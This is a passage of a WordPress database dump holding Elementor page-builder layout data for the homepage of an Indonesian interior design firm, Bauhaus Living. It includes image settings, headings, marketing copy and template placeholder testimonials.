leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3855,4869,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3856,4869,'_elementor_pro_version','3.8.1'),(3857,4870,'_wp_page_template','elementor_header_footer'),(3858,4870,'_elementor_edit_mode','builder'),(3859,4870,'_elementor_template_type','wp-page'),(3860,4870,'_elementor_version','3.8.1'),(3861,4870,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 